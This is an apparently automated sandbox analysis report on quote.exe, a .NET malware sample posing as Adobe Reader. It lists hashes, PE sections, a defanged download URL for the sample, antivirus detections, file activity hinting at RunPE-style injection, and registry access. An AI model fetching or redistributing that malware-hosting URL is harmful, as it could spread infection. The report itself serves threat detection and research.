MalScore: 100/100
MalFamily: Malicious

quote.exe

File details
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 324.00 KB (331776 bytes)
Compile time: 2018-06-05 09:13:23
MD5: 19a022e9ee73b56285fa5265b24006ec
SHA1: 51a4cfb3a1f13996ad368279264861c5636a45be
SHA256: 91e041ff14916fd2d84ca5413a2f639d388933fdd43b537394323934b22eb7c6
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections 3 .text .rsrc .reloc
Directories 3 import resource relocation
First submission: 2018-06-06 19:57:03
Last submission: 2018-06-06 19:57:03
Filename detected: - quote.exe (1)
URL file hosting
hXXp://lamborkolapo.com/era/quote.exe
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-06-06 05:04:12 [34/69] VirusTotal
PE Sections 2 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0x4a664 305152 708a925f5232103b214fa109c0a990bf c107505448ed700dc9817a25c0113d44940b903f
.rsrc 0x4e000 0x60ca 25088 1078cde83e7d6f4b154173f1df77c057 6eb6700b0b3fd09bca68c7d5c7b80ea0b5bc56ca
.reloc 0x56000 0xc 512 c3fe79724d3d3ba9b5fdbc412c57e70e 54908547a3959d7a8a8d934decd1d1d105c9d398
PE Resources
Name Offset Size Language Sublanguage Data
RT_ICON 0x53798 1128 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_GROUP_ICON 0x53c00 118 LANG_NEUTRAL SUBLANG_NEUTRAL
RT_VERSION 0x53c78 1106 LANG_ENGLISH SUBLANG_ENGLISH_US
  • API Alert
  • Anti Debug
Meta Info
LegalCopyright: Copyright 1984-2012 Adobe Systems Incorporated and its licensors. All rights reserved.
ProductVersion: 11.0.0.379
CompanyName: Adobe Systems Incorporated
FileVersion: 11.0.0.379
FileDescription: Adobe Reader
Translation: 0x0409 0x04e4
OriginalFilename: AcroRd32.exe
ProductName: Adobe Reader
XOR
No XOR information found in this file.
Signature
This file isn't digitally signed
Packer(s)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
File type: Library
mscoree.dll
IP Found
No IP detected
URL(s)
No URL found
String too long
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven06_64 Seven06_64 VirtualBox 2018-06-06 19:54:58 2018-06-06 19:57:50 172

6 Behaviors detected by system signatures

8 Summary items with data

Files

C:\Windows\System32\MSCOREE.DLL.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\Microsoft.NET\Framework\*
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Users\Seven01\AppData\Local\Temp\quote.exe.config
C:\Users\Seven01\AppData\Local\Temp\quote.exe
C:\Users\Seven01\AppData\Local\Temp\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\system\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\ProgramData\Oracle\Java\javapath\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\wbem\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Windows\System32\WindowsPowerShell\v1.0\api-ms-win-appmodel-runtime-l1-1-0.dll
C:\Users\Seven01\AppData\Local\Temp\quote.exe.Local\
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows
C:\Windows\winsxs
C:\Windows\Microsoft.NET\Framework\v4.0.30319
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\fusion.localgac
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
C:\Users
C:\Users\Seven01
C:\Users\Seven01\AppData
C:\Users\Seven01\AppData\Local
C:\Users\Seven01\AppData\Local\Temp
C:\Windows\System32\l_intl.nls
C:\Windows\Microsoft.NET\Framework\v2.0.50727\ole32.dll
\Device\KsecDD
C:\Users\Seven01\AppData\Local\Temp\quote.INI
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\GAC\PublisherPolicy.tme
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\assembly\GAC_MSIL\System.Windows.Forms\2.0.0.0__b77a5c561934e089\System.Windows.Forms.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.INI
C:\Windows\assembly\GAC_MSIL\System.Drawing\2.0.0.0__b03f5f7f11d50a3a\System.Drawing.INI
C:\Windows\System32\tzres.dll
C:\Windows\Globalization\it-it.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Users\Seven01\AppData\Local\Temp\it-IT\quote.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\quote.resources\quote.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\quote.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\quote.resources\quote.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it-IT\mscorrc.dll.DLL
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\Globalization\it.nlp
C:\Users\Seven01\AppData\Local\Temp\it\quote.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\quote.resources\quote.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\quote.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\quote.resources\quote.resources.exe
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\bcrypt.dll
C:\Windows\Globalization\en-us.nlp
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Windows\assembly\GAC\mscorlib.resources\2.0.0.0_it-IT_b77a5c561934e089
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\mscorlib.resources\mscorlib.resources.exe
C:\Windows\assembly\GAC_32\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.INI
C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\psapi.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.dll
C:\Users\Seven01\AppData\Local\Temp\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\RunPEDll\RunPEDll.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it-IT\stub.resources\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.dll
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources.exe
C:\Users\Seven01\AppData\Local\Temp\it\stub.resources\stub.resources.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2392.33638500
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2392.33638500
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2392.33638531
C:\Windows\SysWOW64\ntdll.dll

Read Files

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Users\Seven01\AppData\Local\Temp\quote.exe.config
C:\Users\Seven01\AppData\Local\Temp\quote.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.6229_none_d089f796442de10e\msvcr80.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\machine.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch
C:\Windows\assembly\NativeImages_v2.0.50727_32\index126.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
C:\Windows\System32\l_intl.nls
\Device\KsecDD
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorjit.dll
C:\Windows\assembly\pubpol23.dat
C:\Windows\assembly\NativeImages_v2.0.50727_32\System\9e0a3b9b9f457233a335d7fba8f95419\System.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\dbfe8642a8ed7b2b103ad28e0c96418a\System.Drawing.ni.dll
C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\3afcd5168c7a6cb02eab99d7fd71e102\System.Windows.Forms.ni.dll
C:\Windows\System32\tzres.dll
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
C:\Windows\Microsoft.NET\Framework\v2.0.50727\Culture.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\it\mscorrc.dll
C:\Windows\assembly\GAC_MSIL\mscorlib.resources\2.0.0.0_it_b77a5c561934e089\mscorlib.resources.dll
C:\Windows\SysWOW64\ntdll.dll

Write Files

Nothing to display

Delete Files

C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.2392.33638500
C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.2392.33638500
C:\Users\Seven01\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.2392.33638531

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\v4.0
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_CURRENT_USER\Software\Microsoft\.NETFramework
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\Standards\v2.0.50727
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Policy\AppPatch
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\quote.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_CURRENT_USER\Software\Microsoft\Fusion
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000
HKEY_LOCAL_MACHINE\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\GACChangeNotification\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\76102c9c\6667f49c
HKEY_LOCAL_MACHINE\Software\Microsoft\StrongName
HKEY_LOCAL_MACHINE\Software\Microsoft\Fusion\PublisherPolicy\Default
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2dd6ac50\163e1f5e\80\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
